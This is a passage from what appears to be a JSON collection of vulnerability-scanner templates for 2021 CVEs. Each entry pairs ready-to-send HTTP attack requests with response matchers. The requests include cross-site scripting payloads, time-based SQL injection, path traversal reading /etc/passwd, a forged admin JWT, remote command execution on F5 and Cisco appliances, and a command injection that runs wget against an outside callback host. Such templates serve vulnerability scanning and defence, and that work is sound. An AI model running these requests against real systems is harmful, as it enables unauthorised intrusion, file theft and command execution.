Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication 